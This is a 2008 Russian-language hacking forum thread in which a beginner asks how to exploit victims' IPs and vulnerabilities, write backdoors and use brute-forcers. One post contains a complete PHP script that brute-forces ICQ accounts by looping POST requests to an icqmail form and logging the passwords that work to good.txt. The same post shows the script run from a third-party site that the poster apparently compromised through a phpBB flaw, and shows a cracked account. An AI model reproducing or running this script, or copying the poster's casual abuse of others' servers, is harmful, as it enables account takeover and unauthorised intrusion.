Нужна помощь.Хочу освоить Интернет (получение доступа)
#1
Отправлено 16.04.2008, 16:44:28
Интересует следующее:
Что делать с информацией о потонциальной жертве (как её юзать с выгодой) ... ip, порты, уязвимости.
Какой программой (актуальной) можно выявлять - уязвимости на серверах и частных машинах.
Как писать (на чём писать) - блекдоры?
Актуальны ли сейчас - брутфорсы и какие стоит юзать?
Как настроить AccessDiver и как его с умом юзать?
Можно ли найти людей в Алматы - в реале, классно разбирающихся в вопросах получения доступа (за деньги) для прохаждения у них курса "молодого бойца"?
Можно ли освоить искуство проникновения со знанием (минимума в языках програмирования или без таковых)?
Буду признателен за любую информацию, ... т.к. "загорелось" освоить данную стезю.
Накачал кучу софта, кучу статей... но собрать всё во едино пока не получается...
#6
Отправлено 16.04.2008, 17:33:17
По этому поводу полно ресурсов в сети... Полно книг... как по защите, так и атакам...
Скажу больше,.... почти нечего нет.(не актуальный хлам) Из класных взломщиков в московских форумах только Кузя (автор одной доступной и хорошей книги) http://forum.inattac...topic=6313&st=0
Но он с "чайниками" не общается.... а толковых людей по мимо его, мною не наблюдалось.
Просил москвичей помочь с брутфосом но дальше "стандартной" заготовки они не чего не умеют.
Сообщение отредактировал ® -=_Р-у-©-©-к-и-й_=- ®: 16.04.2008, 17:34:21
#8
Отправлено 16.04.2008, 17:50:05
Ну и зачем Вам? Если Вам не попадались книги по безопасности сетей стоящие, то это совсем не означает, что их нет.
Соглашусь, но вот где их взять и как взять именно "их" ?
Зачем мне...?
Очень хочется, научится понимать то что другим не доступно.... типо хоби что ли.
Сообщение отредактировал ® -=_Р-у-©-©-к-и-й_=- ®: 16.04.2008, 17:51:01
#10
Отправлено 16.04.2008, 19:09:51
И как вы это хотите совместить?Можно ли освоить искуство проникновения со знанием (минимума в языках програмирования или без таковых)?
Очень хочется, научится понимать то что другим не доступно.... типо хоби что ли.
В смысле?
Вобщето хотелось бы освоить "готовые" програмули а потом начать разбирать PHP CE Perl and Assembler.
Ну что бы посмотреть, что это такое а потом начать разбираться как это работает и писать свои скрипты.
к примеру...
Вот это скррипт брутофорса...
<?
/*//////////////////////////////////////
// ICQ Брутофорс by Zadoxlik //
// Идея The FUF //
*///////////////////////////////////////
?>
<h4>ICQ брутофорс</h4>
<form method=post action="">
Аськи с <input type=text name=diap1> по <input type=text name=diap2>
<BR>тестим на пасс <input type=text name=pass>
<input type=submit value="давай">
</form>
<?
if(@$diap1 && @$diap2 && @$pass){
//Собственно процесс брутофорса
for($i=$diap1; $i<=$diap2; $i++){
$open_host="www.icqmail.com";
$open_port="80";
$main_url2="http://www.icqmail.c...g_icq.asp";
$refer2="http://www.icqmail.c...g_icq.asp";
$host="www.icqmail.com";
$sock = fsockopen($open_host, $open_port, $errno, $errstr, 100);
fputs($sock, "POST ".$main_url2." HTTP/1.0\r\n");
fputs($sock, "Host: ".$host."\r\n");
fputs($sock, "Accept: */*\r\n");
fputs($sock, "Accept-Language: ru\r\n");
fputs($sock, "Proxy-Connection: Keep-Alive\r\n");
fputs($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n");
fputs($sock, "Referer: ".$refer2."\r\n");
fputs($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
fputs($sock, "Content-Length: 116\r\n");
fputs($sock, "Pragma: no-cache\r\n");
fputs($sock, "Cookie: lang=xx; temp=; domaincode=icq\r\n");
fputs($sock, "\r\n");
fputs($sock, "AltID=".$i."&user=gfsdghfshh&pwd=".$pass."&repwd=".$pass."&firstname=&lastname=&tosagree=on&action=register&xo=\r\n");
fputs($sock, "US\r\n");
fputs($sock, "\r\n");
$u=fread($sock, 100);
for($x=0;$x < 900;$x++){
$headers = fgets ($sock, 4096);
@$a=$a.$headers;}
fclose($sock);
@$good=eregi("(We're sorry, your ICQ)", $a);
$a="0";
if(!@$good){
$fp=fopen("good.txt","a");
$messaga=$i." - pass: ".$pass."\r\n";
fputs($fp,$messaga);
fclose($fp);}
}
}
?>
Суть скрипта в том, что через цикл открывается сокет, отсылающий на сервер POST запрос.. Таким образом можно пробивать несколько асек на один пароль, либо одну аську на пароль скажем из какой-то библииотеки. Этот скрипт предназначен для пробивания ряда асек на один пароль...
Попробуем его в деле....
303615701
Это пробная ася. Пароль на нее
123321_
Попробуем пробрутить его..
=))) Я предварительно залил скрипт на один сайтик. Он не мой =)) На нем стоял злополучный PHPBB 2.0.10 )))
Посканим такой небольшой диапозон..
Если пароль от аськи подходит, данные об этом записываются в файл good.txt
Смотрим....
303615701 - pass: 123321_
Вот так вот =)))
Вообще в качестве примера выбран скрипт, написанный на PHP, хотя для брутофорса это конечно не лучший вариант.
PHP выбран для простоты понимания алгоритма, переписать его на другие языки не составит особого труда.
Вот и все, удачи !
Сообщение отредактировал ® -=_Р-у-©-©-к-и-й_=- ®: 16.04.2008, 19:11:55
#11
Отправлено 16.04.2008, 19:28:04
Может сначала языки программирования освоить, а потом все остальноеВ смысле?
Вобщето хотелось бы освоить "готовые" програмули а потом начать разбирать PHP CE Perl and Assembler.
Ну что бы посмотреть, что это такое а потом начать разбираться как это работает и писать свои скрипты.
Можно ли освоить искуство проникновения со знанием (минимума в языках програмирования или без таковых)?
#17
Отправлено 16.04.2008, 23:39:09
#19
Отправлено 17.04.2008, 10:06:02
если цель сайт. портал...
смотри на чем крутиться, потом начинай шерстить инет на предмет дыр и тп уязв. Или если понимаешь, то на чем куртиться, сам вникай.
На АД есть много разных мануалов в инете.
и еще , как отметили сверху, "бэкдор", не блэк
гугли
Есть возможность подсказать: порядок освоения програм и языков програмирования?
Если цель сайт? А именно интерессны актуальные ресурсы, соглашусь гугл рулит.... но получить "нужную" инфу не всегда возможно, т.к. не всегда понятно что именно нужно для конкретной ситуации.
По этому с начало хотелось бы освоить ПО ( с вводом ай - пи и кнопкой взлом... само сабой буду ломать СЕБЯ.,... не нужны мне "мидали и ордена" хочу научится разбиратся в этом САМ и для СЕБЯ).
Кто нибудь может помочь?
Сообщение отредактировал ® -=_Р-у-©-©-к-и-й_=- ®: 17.04.2008, 10:09:45
Количество пользователей, читающих эту тему: 1
пользователей: 0, неизвестных прохожих: 1, скрытых пользователей: 0